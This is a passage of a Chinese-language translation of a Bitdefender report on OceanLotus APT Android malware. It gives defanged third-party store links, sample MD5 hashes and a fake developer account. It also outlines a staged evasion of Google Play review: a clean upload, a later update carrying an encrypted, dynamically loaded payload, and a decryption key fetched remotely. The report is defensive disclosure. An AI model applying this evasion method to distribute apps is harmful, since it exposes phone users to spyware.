hxxps://apk.support/app/net.vilakeyice.openglplugin hxxps://apkplz.net/app/com.zimice.browserturbo hxxps://apk.support/app/com.zimice.browserturbo hxxps://androidappsapk.co/download/com.techiholding.app.babycare/ hxxps://www.apkmonk.com/app/com.techiholding.app.babycare/ hxxps://apkpure.com/cham-soc-be-yeu-babycare/com.techiholding.app.babycare hxxps://apk.support/app-th/com.techiholding.app.babycare 虽然已经有了海莲花APT组织的样本完整列表,我们知道这些样本已出现在Google Play中,但我们添加了以下一些内容,这些内容也已在Google Play上得到确认。 由Bitdefender研究人员发现的海莲花APT组织的其他新样本的md5完整列表如下: 3043a2038b4cb0586f5c52d44be9127d f449cca2bc85b09e9bf4d3c4afa707b6 76265edd8c8c91ad449f9f30c02d2e0b 5d909eff600adfb5c9173305c64678e7 66d4025f4b60abdfa415ebd39dabee49 7562adab62491c021225166c7101e8a1 7b8cba0a475220cc3165a7153147aa84 63e61520febee25fb6777aaa14deeb4a 9236cf4bf1062bfc44c308c723bda7d4 f271b65fa149e0f18594dd2e831fcb30 e6363b3fae89365648b3508c414740cd d9e860e88c22f0b779b8bacef418379e 3d4373015fd5473e0af73bdb3d65fe6a a57bac46c5690a6896374c68aa44d7b3 08663152d9e9083d7be46eb2a16d374c 18577035b53cae69317c95ef2541ef94 eee6dcee1ab06a8fbb8dc234d2989126 5d07791f6f4d892655c3674d142fe12b f0ea1a4d81f8970b0a1f4d5c41f728d8 320e2283c8751851362b858ad5b7b49c 1fb9d7122107b3c048a4a201d0da54cd bb12cc42243ca325a7fe27f88f5b1e1b 01b0b1418e8fee0717cf1c5f10a6086b 4acf53c532e11ea4764a8d822ade9771 6ff1c823e98e35bb7a5091ea52969c6f 1e5213e02dd6f7152f4146e14ba7aa36 3fe46408a43259e400f7088c211a16a3 c334bade6aa52db3eccf0167a591966a 53ba3286a335807e8d2df4aae0bd0977 7f59cb904e2e0548b7f0db12c08b9e25 49d1c82a6b73551743a12faec0c9e8b1 6b323840d7cb55bb5c9287fc7b137e83 2e1ed1f4a5c9149c241856fb07b8216b 6737fba0f2b3ea392f495af9a0aa0306 bda442858c33ae7d9f80227c55f6a584 规避Google Play保护 攻击者通常向Google Play提交一个干净的版本,然后随机等待一段时间,再简单地使用恶意代码更新应用程序。网络犯罪分子似乎也使用了这种策略。 例如,应用程序net.vilakeyice.openglplugin(OpenGLPlugin)最初于 2018 年8月5 日以纯净格式上传,然后在8月21日引入了恶意payload。 APK Seen on Google Play No Payload 7285f44fa75c3c7a27bbb4870fc0cdca 2018.08.05 With Payload d924211bef188ce4c19400eccb6754da 2018.08.21 然后,将payload解密并动态加载到应用程序中。如果较旧的样本将解密密钥本地嵌入在原始的干净应用程序中,则较新的样本将不再将其存储在本地,因为它们似乎接收了解密密钥以及恶意payload。 归因和可用性 尽管这些Android恶意软件样本的归属已经成为安全行业分析的主题,但海莲花APT组织已经被标记为幕后主谋。不过样本仍存在于第三方市场这一事实应当引起注意。 某些时候Google Play上的某些样本目前仍可在第三方市场上获得,  包括在Amazon上。在世界各地可能无法从官方Google Play市场访问内容的地区,用户仍然有感染这种恶意软件的风险。 在亚马逊印度的这个特定样本中,开发人员名称为Caleb Eisenhauer(假名),该应用程序似乎已于 2020 年2月16日发布。与该帐户关联的电子邮件地址(malcesshartspur@gmail.com)发送至托管在GitHub(https://github.com/malcesshartspur)上的隐私政策。 可能存在类似的虚假开发者帐户,它们都在第三方市场上散布了各种样本,如果不删除,有可能在很长一段时间内感染受害者。     消息来源:Bitdefender, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接